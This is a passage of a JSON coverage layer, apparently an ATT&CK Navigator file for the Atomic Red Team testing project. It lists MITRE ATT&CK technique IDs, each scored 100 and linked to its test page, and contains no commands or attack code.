Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1090.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View 
